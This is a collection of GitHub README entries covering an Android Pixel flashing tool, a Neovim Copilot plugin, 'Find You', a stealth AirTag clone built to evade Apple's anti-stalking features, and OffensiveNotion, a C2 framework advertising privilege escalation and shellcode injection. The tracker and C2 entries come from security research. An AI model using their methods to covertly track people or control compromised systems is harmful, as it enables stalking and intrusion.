easy to follow. - Easily open ADB shell to the device. - Support for Genymotion Scrcpy to mirror Android devices (video and audio) via USB or over TCP/IP, and allows to control the device with the keyboard and the mouse of the computer. - A lot of checks and validations for smooth operation with quite verbose console output to inform about every step of the operation. - Automatic check for program updates. - Package (Application) Manager, [screenshot](images/Package-Manager.png): - Disable (Freeze) - Enable - Uninstall - Install APK - Download APK - Multi-Select - Show Package Details. - Add app to Magisk denylist. - Control app's superuser permissions, [screenshot](images/su-permissions.png). **Expert mode:** (should only be turned on by experienced users). In addition to the basic features, you get: - The ability to flash custom ROM (with or without patching `boot` / `init_boot`) - Option to flash to both slots. - Options to disable verity and or verification. - Ability to change the active slot. - Ability to live boot to custom `boot` / `init_boot` (temporary root). - Ability to boot to recovery, fastbootd, safe mode, download mode and sideload. - Ability to flash custom image: boot, recovery, radio, kernel, ... - Ability to sideload an image. - Lock / Unlock bootloader. - Option to gain temporary root (good for testing or checking things out). - SOS Disable Magisk modules to get out of bootloop (experimental). - Force option when flashing. - Option to skip rebooting. - Option to wipe. - Partition Manager: - Erase single or multi partitions. - Dump / create backup of single or multi partitions and save to PC. ## Prerequisites - [Android SDK Platform-Tools](https://developer.android.com/studio/releases/platform-tools.html). - Android Pixel phone [factory image](https://developers.google.com/android/images) or Android Pixel phone [full OTA image](https://developers.google.com/android/ota). - Bootloader unlocked phone (see excellent guide links in credits section below). - On Windows: The latest [Google USB drivers](https://developer.android.com/studio/run/win-usb?authuser=1%2F) installed in adb and fastboot modes. - On MacOS: [Allow USB Accessory to connect](https://support.apple.com/en-us/102282) (very important!). - On Linux: [User needs to be added](https://developer.android.com/studio/run/device#setting-up) to `plugdev` group. ## Installation PixelFlasher doesn't have to be installed, just double-click it and it'll start. Check the [releases section](https://github.com/badabing2005/PixelFlasher/releases) for downloads. ### Supported platforms - Windows - MacOSX - Linux (See [this](https://github.com/badabing2005/PixelFlasher/issues/23) if you're having issues with a Linux build.) ## Status Scan the [list of open issues](https://github.com/badabing2005/PixelFlasher/issues) for bugs and pending features. **Note** This is my first wxPython based project. I got ideas and inspiration from [nodemcu-pyflasher](https://github.com/marcelstoer/nodemcu-pyflasher). If you have constructive feedback as for how to improve the code please do reach out to me. ## Build it yourself If you want to build this application yourself you need to: **Setup** - Download or clone the repository. - Install [Python 3.x](https://www.python.org/downloads/) and [Pip](https://pip.pypa.io/en/stable/installing/) (it comes with Pythonโ„ข if installed from `python.org`) _See note below if building on MacOS._ - Install virtualenv `pip3 install virtualenv` - Create a virtual environment with: - On Windows: `virtualenv --python <PATH_TO_PYTHON_EXE> venv` - On Linux / MacOS: `python3 -m venv venv` - Activate the virtual environment with: - On Windows: `.\venv\Scripts\activate` - On Linux / MacOS: `. venv/bin/activate` - Run `pip3 install -r requirements.txt` **A note on Linux:** As described on the [downloads section of `wxPython`](https://www.wxpython.org/pages/downloads/), wheels for Linux are complicated and may require you to run something like this to install `wxPython` correctly: ```bash # Assuming you are running it on Ubuntu 20.04 LTS with GTK3 pip install -U \ -f https://extras.wxpython.org/wxPython4/extras/linux/gtk3/ubuntu-20.04 \ wxPython ``` **A note on Windows** If you run into troubles installing wxPython on Windows, you can download wxPython wheel file matching your version of Pythonโ„ข from [here](https://wxpython.org/Phoenix/snapshot-builds/?C=M;O=D) Look for `cp310` if your pythonโ„ข version is 3.10 You install it with `pip`, for example this would be the command to install 3.10 version. ```bash pip install wxPython-4.1.2a1.dev5308+2258f215-cp310-cp310-win_amd64.whl ``` **A Note on MacOS** Don't install Pythonโ„ข on MacOS, instead `brew install wxpython`, this will install Pythonโ„ข 3.9.12, the installed wxPython will only work with this version of Python. If python 3.9.12 is not in the system path, you can find it here: `/usr/local/Cellar/python@3.9/3.9.12/Frameworks/Python.framework/Versions/3.9/bin` It is advised that you add this to your system `PATH` On MacOS, you should also install `create-dmg` ```bash brew install node graphicsmagick imagemagick npm install --global create-dmg ``` **Build** Run `build.bat` on Windows or `build.sh` on Linux / MacOS. ## Usage ### Basic Mode ![Image of PixelFlasher GUI](/images/basic-gui.png) 1. First thing to do is select Androidโ„ข Platform Tools, if Androidโ„ข Platform Tools is already in your `PATH` environment, the application will detect it and pre-populate it. Otherwise you'd have to select where it is installed. You can download the latest Androidโ„ข Platform Tools by clicking the ![Image of link](/images/open-link-16.png) next to it. If you have multiple versions, you can select another version, although it is best to always use the most recent version (The selected version will be identified and displayed.) 2. Hit the `Scan` button to detect connected devices, the application will detect all connected devices (in adb, fastboot, sideload, recovery modes) and populate the combo box (2). 3. Select your device from the list in the combo box. The following information about the connected device is displayed. - (1st field) Rooted devices will be identified with a checkmark โœ“. **Note:** If you want PixelFlasher to detect root, or automatically use Magisk to patch boot.img, you need to grant root permissions to `shell` in Magisk. ![Image of shell root access](/images/shell-root.png) - (1st field) Non-Rooted devices will be identified with a โœ—. - (1st field) Devices in fastboot mode will be identified with a ? (in fastboot mode, root status cannot be determined). - (2nd field) (adb), (f.b), (sid) or (rec) to indicate connection mode adb / fastboot / sideload / recovery. - (3rd field) Device ID. - (4th field) Device hardware. - (5th field) Current running firmware (in fastboot mode current firmware cannot be determined). 4. Next select the full OTA (recommended) or factory zip file (don't unzip), the application will recognize the phone model from the image name and validate the SHA-256 checksum. You can download [factory images](https://developers.google.com/android/images) by clicking the ![Image of link](/images/open-link-16.png) next to it. You can download full OTA images from [here](https://developers.google.com/android/ota). **Note:** Because both firmware package and full OTA are complete images, you can upgrade to any newer version without worrying about jumping versions (downgrades with factory image are possible only with wipe data). 5. Process the full OTA or factory image. PixelFlasher will extract `boot.img` (or `init_boot.img` for Pixel 7 or newer devices) file from the image and populate it in the list below (5). 6. Select `boot.img` (or `init_boot.img` for Pixel 7 or newer devices) from the list, the selected file can be patched (6), or flashed (10). 7. Optional: Select this option if you want to patch the `boot.img` (or `init_boot.img` for Pixel 7 or newer devices) with Magisk. If Magisk is not already installed on your phone, PixelFlasher will install it for you. Your phone does not need to be rooted to create a patched file. This would be the typical choice for monthly updates. This option will allow updating the phone without losing root (not even temporarily). **Note:** See note above for granting root permissions to `shell`. Whether the phone is rooted or not, the whole process is without any manual step. 8. If you want to flash (10) a patched `boot.img` (or `init_boot.img` for Pixel 7 or newer devices) select the newly added entry. The following details are listed. - ![Image of patched-boot](/images/patched-16.png) Indicates that the selection is patched. - **SHA1** is (shortened for display only) sha1 of `boot.img` (or `init_boot.img` for Pixel 7 or newer devices) - **Source SHA1** (shortened for display only) SHA1 of source `boot.img` extracted from the image (This should be the same as SHA1 of an unpatched `boot.img`) - **Package Fingerprint** is just the filename portion of the image (without the extension). - **Patched with Version** indicates the version of Magisk / KernelSU / Apatch used to patch the image (if applicable). - **Patched Method** indicates what method PixelFlasher used to create a patch (possible options: `root`, `app`, `uiautomator`, `manual`) - **Patched on Device** indicates the device model that performed the patching. You should always use patched images that match the model of the device that it will be flashed on. - **Date** is the either the date the `boot.img` was extracted, or the date it was patched. - **Package Path** indicates the file from which `boot.img` (or `init_boot.img` for Pixel 7 or newer devices) was extracted. 9. Select the Flash Mode, PixelFlasher will automatically select applicable flash mode based on the selected image type. - If full OTA image is selected in step 4: - **Full OTA**: Will flash full OTA image in sideload mode. Features of this mode: - This will always flash to **inactive slot only**, (hence why the option to flash to both slots is disabled) similar to how OTA updates happen on the phone. - It will always be **Keep Data**, there is no option for **Wipe**, hence why the option is disabled. - If something goes wrong during flashing, the active flash is unaffected and the phone boots back to active functional slot. - If you flash to both slots (ie flash twice in a row) then both slots would be bootable. - Your phone's bootloader does not have to be unlocked to be able to flash full OTA image (stock boot only). - You cannot downgrade with OTA, the version being installed has to be equal or higher. - If factory firmware is selected in step 4: - **Keep Data**: In this mode `-w` flag is removed from the flash scripts so that data is not wiped. This is commonly known as `dirty flashing`. - **WIPE all data**: As the text suggests, this will wipe your data, use it with caution! If this mode is selected PixelFlasher will ask for confirmation during the flashing phase. - **Dry Run**: In this mode, the phone will reboot to bootloader, and then mimic the flash actions (i.e. reboot into bootloader) without actually flashing anything (it prints to the console the steps it would have performed if dry run was not chosen). This is handy for testing to check if the PixelFlasher properly is able to control fastboot commands. 10. Optional: Open Magisk Modules Manager and disable (uncheck) modules known to cause issues during upgrades (highly recommended). (The list below has never caused issues for me, so I keep them enabled YMMV). ![Image of PixelFlasher GUI](/images/magisk-modules-manager.png) 11. **Flash Pixel Phone** This is the final step, to actually flash the phone in the selected `Flash Mode`. **Note**: Unlike the previous versions of the PixelFlasher, all the options are dynamic, i.e. depending on what you select before clicking the Flash button, there is no more concept of prepared package. PixelFlasher will first present you the selected options and ask for your confirmation if you want to proceed with flashing. 12. Monitor the **console** output and observe the performed actions and their outcomes. 13. In case of trouble, click on **Support** button to generate sanitized (redacted) support logs archive. ### Expert Mode To enable the export mode use the **File Menu | Advanced Configuration** and select `Enable Advanced Options` ![Image of PixelFlasher GUI](/images/advanced-options.png) ![Image of PixelFlasher GUI](/images/advanced-gui.png) In this mode the following additional options are exposed (green bounding boxes), below notes are more for enumeration than a guide, as they should be trivial and obvious to an expert. 1. Option to Change the Active Slot (the inactive slot is automatically selected). Options to reboot to Recovery, Download, Safe Mode. 2. Options to Lock / Unlock bootloader, Option to disable Magisk modules when bootlooping, partitions manager. 3. Apply Custom ROM. This replaces the factory ROM image with the selected file. PixelFlasher extracts `boot.img` (or `init_boot.img` for Pixel 7 or newer devices) from the ROM image and displays below for selection or patching. Please make sure to read the documentation of the chosen ROM, as each custom ROM instructions could be different. To be clear, this is what PixelFlasher does internally when this mode is selected, please understand it, and don't use it if the selected ROM guide does not fit the bill. You've been warned! - Keeps stock bootloader and radio images. - Replaces the stock ROM image with the selected custom ROM image. - Flashes in the chosen `Flash Mode` just like a stock image, i.e. bootloader, custom ROM and radio images in the original order that they were in the stock firmware. - Patching `boot.img` (or `init_boot.img` for Pixel 7 or newer devices) can be performed if the option is selected. You can select any of the listed files. - Flash Mode is similar to basic flash mode described above in step 7. 4. Custom Flash. select this to switch from flashing a Factory Image to flashing a single file. 5. Browse to select a a valid image file (.img or .zip). Or select a boot.img from the list above and click on the paste button to paste the selected boot.img into the file selection. Choose the dropdown to select image type. - boot (can be flashed to Live or boot) - Expected file type .img - bootloader - Expected file type .img - init_boot - Expected file type .img - dtbo - Expected file type .img - product - Expected file type .img - radio - Expected file type .img - recovery - Expected file type .img - super_empty - Expected file type .img - system - Expected file type .img - system_ext - Expected file type .img - system_other - Expected file type .img - vbmeta - Expected file type .img - vbmeta_system - Expected file type .img - vbmeta_vendor - Expected file type .img - vendor - Expected file type .img - vendor_boot - Expected file type .img - vendor_dlkm (the device will be put into fastbootd mode during this operation) - Expected file type .img - image - Expected file type .zip - SIDELOAD - Expected file type .zip Select the appropriate flash options. **Note:** For Tensor devices (Pixel 6 or newer devices) When `Flash to both slots` option is selected, Pixelflasher flashes each slot individually to overcome a Google bug that fails with the option `--slot=all` ## Credits - First and foremost [Magisk](https://github.com/topjohnwu/Magisk/releases) by [John Wu](https://github.com/topjohnwu) which made rooting Pixelโ„ข phones possible, without it none of this would have mattered. - Big thanks to [[ryder203]](https://www.t-ryder.de/), [[t-ryder]](https://xdaforums.com/m/t-ryder.3705546/) for his valuable ideas, feedback and testing. Your contributions are very much appreciated. - [[Homeboy76]](https://xdaforums.com/m/homeboy76.4810220/), [[v0latyle]](https://xdaforums.com/m/v0latyle.3690504/) and [[roirraW-edor-ehT]](https://xdaforums.com/m/roirraw-edor-eht.2560614/) at [xda](https://xdaforums.com/) for their excellent guides [[here](https://xdaforums.com/t/guide-november-6-2023-root-pixel-8-pro-unlock-bootloader-pass-safetynet-both-slots-bootable-more.4638510/#post-89128833/), [here](https://xdaforums.com/t/guide-pixel-6-oriole-unlock-bootloader-update-root-pass-safetynet.4356233/) and [here](https://xdaforums.com/t/november-6-2023-ud1a-231105-004-magisk-stable-v26-4-released-unlock-bootloader-root-pixel-8-pro-husky-safetynet.4633839/)] on Pixelโ„ข series phones. This program could not have been possible without their easy to follow guides. I strongly encourage all beginners to follow those guides rather than use this program, it is important to understand the basic steps involved before diving into one click tools or advanced tasks. - Marcel Stรถr's [nodemcu-pyflasher](https://github.com/marcelstoer/nodemcu-pyflasher) source code which jump started my introduction to [wxPython](https://www.wxpython.org/) and eventually this program. - [wxPython Team](https://wxpython.org/) for their cross-platform GUI toolkit for Python. - [JackMcKew](https://github.com/JackMcKew) for pyinstaller Github Actions. - Endless counts of [xda](https://xdaforums.com/) members and their posts that tirelessly answer questions and share tools. Too many to enumerate. - Artwork / graphics / icons, designed and supplied by: [[ryder203]](https://www.t-ryder.de/), [[t-ryder]](https://xdaforums.com/m/t-ryder.3705546/) based on [material-design-icons](https://github.com/google/material-design-icons/blob/master/LICENSE) - vm03's [payload_dumper](https://github.com/vm03/payload_dumper) source code to extract images from payload.bin files. ## Troubleshooting If you need support or assistance, please **generate and provide a support file** from within PixelFlasher. You can hit that big Support button on the main screen, or select it from the Help menu. The generated support.zip file is sanitized (redacted) to keep your sensitive information (username device id ...) private. - If your anti-virus program is telling you that PixelFlasher is a malware, or you are concerned in any way, please check [this post](https://xdaforums.com/t/pixelflasher-a-gui-tool-for-flashing-updating-rooting-managing-pixel-phones.4415453/post-89090938) about false positives. ## Disclaimer ```text ******************************************************************************** PLEASE DO YOUR PART AND READ / SEARCH / RESEARCH BEFORE USING THIS PROGRAM AND/OR ATTEMPTING ANY MODIFICATIONS ON YOUR DEVICE. THIS PROGRAM ASSUMES THAT YOU ALREADY KNOW HOW TO AND HAVE ALREADY UNLOCKED YOUR BOOTLOADER, ALREADY ROOTED YOUR DEVICE, AND KNOW HOW TO USE ANDROID SDK PLATFORM-TOOLS, ETC. THIS TOOL IS SIMPLY MY QUICK WAY OF UPDATING THE FIRMWARE WHILE ROOTED WITH MAGISK, WITHOUT LOSING DATA / REQUIRING A WIPE. MODIFYING YOUR DEVICE COMES WITH INHERENT RISKS, AND IT'S NOT MY RESPONSIBILITY IF YOU LOSE YOUR DATA OR BRICK YOUR DEVICE. THE TOOL I SHARE HAVE WORKED FOR ME, BUT THAT DOESN'T MEAN THAT YOU MAY NOT RUN INTO PROBLEMS. **BACKUP YOUR DATA.** ******************************************************************************** ```
Pixelโ„ข phone flashing GUI utility with features.
python,wxpython,windows,root,flash,pyinstaller,pixel,rom,adb,android
84
7
15
313
3
3
10
zbirenbaum/copilot-cmp
# copilot-cmp This repository transforms https://github.com/zbirenbaum/copilot.lua into a cmp source. Copilot suggestions will automatically be loaded into your cmp menu as snippets and display their full contents when a copilot suggestion is hovered. ![copilot-cmp](https://user-images.githubusercontent.com/32016110/173933674-9ad85a5a-5ad7-41cd-9fcc-f5a698cc88ae.png) ## Setup If you already have copilot.lua installed, you can install this plugin with packer as you would any other with the following code: ### Install #### Lazy ```lua { "zbirenbaum/copilot-cmp", config = function () require("copilot_cmp").setup() end } ``` #### Packer ```lua use { "zbirenbaum/copilot-cmp", after = { "copilot.lua" }, config = function () require("copilot_cmp").setup() end } ``` If you do not have copilot.lua installed, go to https://github.com/zbirenbaum/copilot.lua and follow the instructions there before installing this one It is recommended to disable copilot.lua's suggestion and panel modules, as they can interfere with completions properly appearing in copilot-cmp. To do so, simply place the following in your copilot.lua config: ```lua require("copilot").setup({ suggestion = { enabled = false }, panel = { enabled = false }, }) ``` ### Configuration: #### nvim-cmp: ##### Source Definition To link cmp with this source, simply go into your cmp configuration file and include `{ name = "copilot" }` under your sources Here is an example of what it should look like: ```lua cmp.setup { ... sources = { -- Copilot Source { name = "copilot", group_index = 2 }, -- Other Sources { name = "nvim_lsp", group_index = 2 }, { name = "path", group_index = 2 }, { name = "luasnip", group_index = 2 }, }, ... } ``` ##### Highlighting & Icon Copilot's cmp source now has a builtin highlight group `CmpItemKindCopilot`. To add an icon to copilot for lspkind, simply add copilot to your lspkind symbol map. ```lua -- lspkind.lua local lspkind = require("lspkind") lspkind.init({ symbol_map = { Copilot = "๏„“", }, }) vim.api.nvim_set_hl(0, "CmpItemKindCopilot", {fg ="#6CC644"}) ``` Alternatively, you can add Copilot to the lspkind `symbol_map` within the cmp format function. ```lua -- cmp.lua cmp.setup { ... formatting = { format = lspkind.cmp_format({ mode = "symbol", max_width = 50, symbol_map = { Copilot = "๏„“" } }) } ... } ``` If you do not use lspkind, simply add the custom icon however you normally handle `kind` formatting and it will integrate as if it was any other normal lsp completion kind. ##### Tab Completion Configuration (Highly Recommended) Unlike other completion sources, copilot can use other lines above or below an empty line to provide a completion. This can cause problematic for individuals that select menu entries with `<TAB>`. This behavior is configurable via cmp's config and the following code will make it so that the menu still appears normally, but tab will fallback to indenting unless a non-whitespace character has actually been typed. ```lua local has_words_before = function() if vim.api.nvim_buf_get_option(0, "buftype") == "prompt" then return false end local line, col = unpack(vim.api.nvim_win_get_cursor(0)) return col ~= 0 and vim.api.nvim_buf_get_text(0, line-1, 0, line-1, col, {})[1]:match("^%s*$") == nil end cmp.setup({ mapping = { ["<Tab>"] = vim.schedule_wrap(function(fallback) if cmp.visible() and has_words_before() then cmp.select_next_item({ behavior = cmp.SelectBehavior.Select }) else fallback() end end), }, }) ``` ##### Comparators One custom comparitor for sorting cmp entries is provided: `prioritize`. The `prioritize` comparitor causes copilot entries to appear higher in the cmp menu. It is recommended keeping priority weight at 2, or placing the `exact` comparitor above copilot so that better lsp matches are not stuck below poor copilot matches. Example: ```lua cmp.setup { ... sorting = { priority_weight = 2, comparators = { require("copilot_cmp.comparators").prioritize, -- Below is the default comparitor list and order for nvim-cmp cmp.config.compare.offset, -- cmp.config.compare.scopes, --this is commented in nvim-cmp too cmp.config.compare.exact, cmp.config.compare.score, cmp.config.compare.recently_used, cmp.config.compare.locality, cmp.config.compare.kind, cmp.config.compare.sort_text, cmp.config.compare.length, cmp.config.compare.order, }, }, ... } ``` #### copilot-cmp: Note: It is now **heavily** discouraged to modify the default settings unless an issue gives you good reason to do so. The configurable options for this plugin are as follows: ```lua { event = { "InsertEnter", "LspAttach" }, fix_pairs = true, } ``` ##### event The event parameter configures when the source is registered. Unless you have a unique problem for your particular configuration you probably don't want to touch this. ##### fix_pairs Suppose you have the following code: `print('h')` Copilot might try to account for the `'` and `)` and complete it with this: `print('hello` This is not good behavior for consistency reasons and will just end up deleting the two ending characters. This option fixes that. Don't turn this off unless you are having problems with pairs and believe this might be causing them.
Lua plugin to turn github copilot into a cmp source
copilot,lua,neovim,nvim-cmp,github-copilot
0
14
25
91
12
14
0
positive-security/find-you
# Find You A modified version of OpenHaystack to showcase the possibility of building a stealth AirTag clone that bypasses all of Apple's tracking protection features. More information can be found here: [https://positive.security/blog/find-you](https://positive.security/blog/find-you) ![Find You Cover](Resources/FindYouCover.png) **Please note:** The below mentioned `generate_keypairs.py` has been purposefully left out of this repository and as an exercise for the reader. ## Changes ### Tracker side - Added a python script (not included in this release as noted above) that pregenerates EC key pairs and generates: - A list of public keys in C source code format to add to the firmware - A list of private keys as an OpenHaystack-compatible `.plist` file to import in the retrieval application - Added support to iterate over a preloaded list of public keys with 1 beacon per key and a configurable delay ### Retrieval side - Optimized the application to be able to handle thousands of tags - Combined public keys to request across different tags into a single HTTP request - Slightly optimized quadratic complexity when assigning decrypted reports to accessories - Removed keychain operations (the app will always start without any tags configured) ## Instructions 1. Run `generate_keypairs.py` with the number of keypairs to generate as argument (e.g. `python3 generate_keypairs.py 2000`) 2. Copy the array definition in `pub_keys_c.txt` into `Firmware/ESP32/main/openhaystack_main.c` (if desired, also change the delay time between beacons) 3. Compile firmware and flash ESP32 4. Compile and run the macOS retrieval application and import `accessory_list.plist` (generated in step #1) # <img src="Resources/Icon/OpenHaystackIcon.png" alt="OpenHaystack application icon" height=42 width=42 valign=bottom /> OpenHaystack OpenHaystack is a framework for tracking personal Bluetooth devices via Apple's massive Find My network. Use it to create your own tracking _tags_ that you can append to physical objects (keyrings, backpacks, ...) or integrate it into other Bluetooth-capable devices such as notebooks. <img src="Resources/OpenHaystack-Screenshot.png" alt="Screenshot of the app" width="701" /> ## Table of contents - [What is _OpenHaystack_?](#what-is-openhaystack) - [History](#history) - [Disclaimer](#disclaimer) - [How to use _OpenHaystack_?](#how-to-use-openhaystack) - [System requirements](#system-requirements) - [Installation](#installation) - [Usage](#usage) - [How does Apple's Find My network work?](#how-does-apples-find-my-network-work) - [Pairing](#pairing-1) - [Losing](#losing-2) - [Finding](#finding-3) - [Searching](#searching-4) - [How to track other Bluetooth devices?](#how-to-track-other-bluetooth-devices) - [Authors](#authors) - [References](#references) - [License](#license) ## What is _OpenHaystack_? OpenHaystack is an application that allows you to create your own accessories that are tracked by Apple's [Find My network](#how-does-apples-find-my-network-work). All you need is a Mac and a [BBC micro:bit](https://microbit.org/) or any [other Bluetooth-capable device](#how-to-track-other-bluetooth-devices). By using the app, you can track your accessories anywhere on earth without cellular coverage. Nearby iPhones will discover your accessories and upload their location to Apple's servers when they have a network connection. ### History OpenHaystack is the result of reverse-engineering and security analysis work of Apple's _Find My network_ (or _offline finding_). We at the [Secure Mobile Networking Lab](https://seemoo.de) of TU Darmstadt started analyzing offline finding after its initial announcement in June 2019. We identified how Apple devices can be found by iPhones devices, even when they are offline through this work. The whole system is a clever combination of Bluetooth advertisements, public-key cryptography, and a central database of encrypted location reports. We disclosed a specification of the closed parts of offline finding and conducted a comprehensive security and privacy analysis. We found two distinct vulnerabilities. The most severe one, which allowed a malicious application to access location data, has meanwhile been fixed by Apple ([CVE-2020-9986](https://support.apple.com/en-us/HT211849)). For more information about the security analysis, please read [our paper](#references). Since its release, we received quite a bit of [press and media coverage](https://owlink.org/press/). ### Disclaimer OpenHaystack is experimental software. The code is untested and incomplete. For example, OpenHaystack accessories using our [firmware](Firmware) broadcast a fixed public key and, therefore, are trackable by other devices in proximity (this might change in a future release). OpenHaystack is not affiliated with or endorsed by Apple Inc. ## How to use _OpenHaystack_? OpenHaystack consists of two components. First, we provide a [macOS application](OpenHaystack) that can display the last reported location of your personal Bluetooth devices. Second, the [firmware image](Firmware) enables Bluetooth devices to broadcast beacons that make them discoverable by iPhones. ### System requirements OpenHaystack requires macOS 11 (Big Sur). ### Installation The OpenHaystack application requires a custom plugin for Apple Mail. It is used to download location reports from Apple's servers via a private API (technical explanation: the plugin inherits Apple Mail's entitlements required to use this API). Therefore, the installation procedure is slightly different and requires you to temporarily disable [Gatekeeper](https://support.apple.com/guide/security/gatekeeper-and-runtime-protection-sec5599b66df/1/web/1). Our plugin does not access any other private data such as emails (see [source code](OpenHaystack/OpenHaystackMail)). 1. Download a precompiled binary release from our <a href="https://github.com/seemoo-lab/openhaystack/releases">GitHub page</a>. _Alternative:_ build the application from source via Xcode. 2. Open OpenHaystack. This will ask you to install the Mail plugin in `~/Library/Mail/Bundle`. 3. Open a terminal and run `sudo spctl --master-disable`, which will disable Gatekeeper and allow our Apple Mail plugin to run. 4. Open Apple Mail. Go to _Preferences_ โ†’ _General_ โ†’ _Manage Plug-Ins..._ and activate the checkbox next to _OpenHaystackMail.mailbundle_. * If the _Manage Plug-Ins..._ button does not appear. Run this command in terminal `sudo defaults write "/Library/Preferences/com.apple.mail" EnableBundles 1` 5. Allow access and restart Mail. 6. Open a terminal and enter `sudo spctl --master-enable`, which will enable Gatekeeper again. ### Usage **Adding a new accessory.** To create a new accessory, you just need to enter a name for it and optionally select a suitable icon and a color. The app then generates a new key pair that is used to encrypt and decrypt the location reports. The private key is stored in your Mac's keychain. **Deploy to device.** Connect a [supported device](#how-to-track-other-bluetooth-devices) via USB to your Mac and hit the _Deploy_ button next to the accessory's name and choose the corresponding. Instead of using OpenHaystack's integrated deployment, you may also copy the public key used for advertising (right click on accessory) and deploy it manually. **Display devices' locations.** It can take up to 30 minutes until you will see the first location report on the map on the right side. The map will always show all your items' most recent locations. You can click on every item to check when the last update was received. By clicking the reload button, you can update the location reports. ## How does Apple's Find My network work? We briefly explain Apple's offline finding system (aka [_Find My network_](https://developer.apple.com/find-my/)). Please refer to our [PETS paper and Apple's accessory specification](#references) for more details. We provide a schematic overview (from our paper) and explain how we integrate the different steps in OpenHaystack below. ![Find My Overview](Resources/FindMyOverview.png) ### Pairing (1) To use Apple's Find My network, we generate a public-private key pair on an elliptic curve (P-224). The private key remains on the Mac securely stored in the keychain, and the public key is deployed on the accessory, e.g., an attached micro:bit. ### Losing (2) In short, the accessories broadcast the public key as Bluetooth Low Energy (BLE) advertisements (see [firmware](Firmware)). Nearby iPhones will not be able to distinguish our accessories from a genuine Apple device or certified accessory. ### Finding (3) When a nearby iPhone receives a BLE advertisement, the iPhone fetches its current location via GPS, encrypts it using public key from the advertisement, and uploads the encrypted report to Apple's server. All iPhones on iOS 13 or newer do this by default. OpenHaystack is not involved in this step. ### Searching (4) Apple does not know which encrypted locations belong to which Apple account or device. Therefore, every Apple user can download any location report as long as they know the corresponding public key. This is not a security issue: all reports are end-to-end encrypted and cannot be decrypted unless one knows the corresponding private key (stored in the keychain). We leverage this feature to download the reports from Apple that have been created for our OpenHaystack accessories. We use our private keys to decrypt the location reports and show the most recent one on the map. Apple protects their database against arbitrary access by requiring an authenticated Apple user to download location reports. We use our Apple Mail plugin, which runs with elevated privileges, to access the required authentication information. The OpenHaystack app communicates with the plugin while downloading reports. This is why you need to keep Mail open while using OpenHaystack. ## How to track other Bluetooth devices? In principle, any Bluetooth device can be turned into an OpenHaystack accessory that is trackable via Apple's Find My network. Currently, we provide a convenient deployment method of our OpenHaystack firmwares for a small number of embedded devices (see table below). We also support Linux devices via our generic HCI script. Feel free to port OpenHaystack to other devices that support Bluetooth Low Energy based on the [source code of our firmware](Firmware) and the specification in [our paper](#references). Please share your results with us! | Platform | Tested on | Deploy via app | Comment | |----------|-----------|:--------------:|---------| | [Nordic nRF51](Firmware/Microbit_v1) | BBC micro:bit v1 | โœ“ | Only supports nRF51822 at this time (see issue #6). | | [Espressif ESP32](Firmware/ESP32) | SP32-WROOM, ESP32-WROVER | โœ“ | Deployment can take up to 3 minutes. Requires Python 3. Thanks **@fhessel**. | | [Linux HCI](Firmware/Linux_HCI) | Raspberry Pi 4 w/ Raspbian | | Should support any Linux machine. | ![Setup](Resources/Setup.jpg) ## Authors - **Alexander Heinrich** ([@Sn0wfreezeDev](https://github.com/Sn0wfreezeDev), [email](mailto:aheinrich@seemoo.tu-darmstadt.de)) - **Milan Stute** ([@schmittner](https://github.com/schmittner), [email](mailto:mstute@seemoo.tu-darmstadt.de), [web](https://seemoo.de/mstute)) ## References - Alexander Heinrich, Milan Stute, Tim Kornhuber, Matthias Hollick. **Who Can _Find My_ Devices? Security and Privacy of Apple's Crowd-Sourced Bluetooth Location Tracking System.** _Proceedings on Privacy Enhancing Technologies (PoPETs)_, 2021. [doi:10.2478/popets-2021-0045](https://doi.org/10.2478/popets-2021-0045) [๐Ÿ“„ Paper](https://www.petsymposium.org/2021/files/papers/issue3/popets-2021-0045.pdf) [๐Ÿ“„ Preprint](https://arxiv.org/abs/2103.02282). - Alexander Heinrich, Milan Stute, and Matthias Hollick. **DEMO: OpenHaystack: A Framework for Tracking Personal Bluetooth Devices via Appleโ€™s Massive Find My Network.** _14th ACM Conference on Security and Privacy in Wireless and Mobile (WiSec โ€™21)_, 2021. - Tim Kornhuber. **Analysis of Apple's Crowd-Sourced Location Tracking System.** _Technical University of Darmstadt_, Master's thesis, 2020. - Apple Inc. **Find My Network Accessory Specification โ€“ Developer Preview โ€“ Release R3.** 2020. [๐Ÿ“„ Download](https://developer.apple.com/find-my/). ## License OpenHaystack and Find You is licensed under the [**GNU Affero General Public License v3.0**](LICENSE).
A stealth AirTag clone that bypasses all of Apple's tracking protection features
null
0
1
1
1
4
1
5
mttaggart/OffensiveNotion
<h1 align="center"> OffensiveNotion </h1> <h3 align="center"> Notion (yes, the notetaking app) as a C2.</h3> <div align="center"> --- A collaboration by: [![Mttaggart](https://img.shields.io/static/v1?label=%20&message=MTTAGGART&color=blueviolet&style=for-the-badge)](https://twitter.com/mttaggart) [![HuskyHacks](https://img.shields.io/static/v1?label=%20&message=HUSKYHACKS&color=008080&style=for-the-badge)](https://twitter.com/huskyhacksmk) --- [Documentation][wiki]&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;[Pull Requests][pr]&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;[Issues][issues] ![Release][release] [![Pull Requests][img-pr-badge]][pr] [![License][img-license-badge]][license] </div> --- ![on](https://user-images.githubusercontent.com/57866415/155594981-1ae9212e-a0f9-4ff3-8a81-8946546dc0a3.gif) ### Wait, What? Yes. ### But Why? What started as a meme grew into a full project. Just roll with it. ### Read more! Here's our blog post about it: [We Put A C2 In Your Notetaking App: OffensiveNotion](https://medium.com/@huskyhacks.mk/we-put-a-c2-in-your-notetaking-app-offensivenotion-3e933bace332) ## Features * ๐Ÿ“ก A full-featured C2 platform built on the Notion notetaking app. * ๐Ÿšง Easy setup: set up your Notion developer API account, drop the Agent to the target, run and enjoy! * ๐Ÿ–ฅ๏ธ Cross-platform agent built in Rust that compiles for Linux, Windows, and macOS with the same code base. Includes a Python setup/controller script to simplify the process. * โ˜ข๏ธ A range of capabilities including port-scanning, privilege escalation, asynchronous command execution, file download, and shellcode injection, all controlled from the comfort of a Notion page! * ๐Ÿ“œ Document as you go! The agent identifies special syntax to run commands, so feel free to use the rest of the Notion page to document your operation. * ๐Ÿค Collaborative by design! Notion allows for multiple people to edit and view your notes. Your listener page can handle multiple agents and you can invite your red team friends to your page. Congratulations, that's a teamserver! * ๐Ÿ“ฑMobile C2! Use the Notion application from your mobile device to issue commands to your agents from anywhere in the world. * ๐Ÿ•ต๏ธโ€โ™€๏ธ Stealth! C2 comms ride over the Notion API natively. Your C2 traffic looks like someone is using Notion for its intended purpose. ## Quickstart See the [Quickstart guide](https://github.com/mttaggart/OffensiveNotion/wiki/2.-Quickstart) on how to 